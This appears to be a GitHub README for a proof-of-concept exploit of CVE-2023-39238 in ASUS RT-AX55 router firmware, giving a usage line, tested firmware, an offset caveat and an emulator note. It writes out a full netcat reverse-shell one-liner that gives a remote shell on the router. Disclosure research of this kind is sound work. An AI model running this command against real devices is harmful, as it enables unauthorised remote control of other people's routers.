Skip to content

Latest commit

 

History

History

CVE-2023-39238

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 

CVE-2023-39238

Exploit

usage: exploit.py [-h] --url URL --credentials CREDENTIALS --cmd CMD

The exploit requires authentication. Read the full blogpost.

The code was tested against the following firmware version:

  • ASUS RT-AX55 Firmware version 3.0.0.4.386.51598

Different firmwares/daemons could have a different offset for the SystemCmd global variable, fix the script accordingly.

The PoC script execute commands and reports their output using other authenticated endpoints. However a reverse shell can be obtained by executing the following: rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.42.102.133 7777 > /tmp/f

Emulator

Qiling>=1.4.7 is required.

usage: emulate.py